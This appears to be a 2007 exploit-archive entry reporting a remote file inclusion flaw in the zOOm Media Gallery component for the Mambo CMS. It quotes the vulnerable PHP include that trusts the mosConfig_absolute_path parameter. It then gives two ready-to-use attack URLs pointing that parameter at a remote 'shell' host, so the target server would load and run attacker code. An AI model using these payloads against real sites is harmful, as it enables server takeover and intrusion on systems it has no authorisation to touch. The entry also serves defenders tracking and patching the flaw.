Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities
# Published : 2007-04-11
# Author : iskorpitx
# Previous Title : Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit
# Next Title : TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns

iskorpitx@metlak
from TURKEY
com_zoom file include



******************************************************************************/

// Create the Makernote Parser and Interpreter Function Array

$GLOBALS['Makernote_Function_Array'] = array(   "Read_Makernote_Tag" => array( ),
                                                "get_Makernote_Text_Value" => array( ),
                                                "Interpret_Makernote_to_HTML" => array( ) );


// Include the Main TIFF and EXIF Tags array

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

/******************************************************************************

http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://shell*
http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://shell*

iskorpitx

admin@siyamiozkan-mavideniz.org

# www.Syue.com [2007-04-11]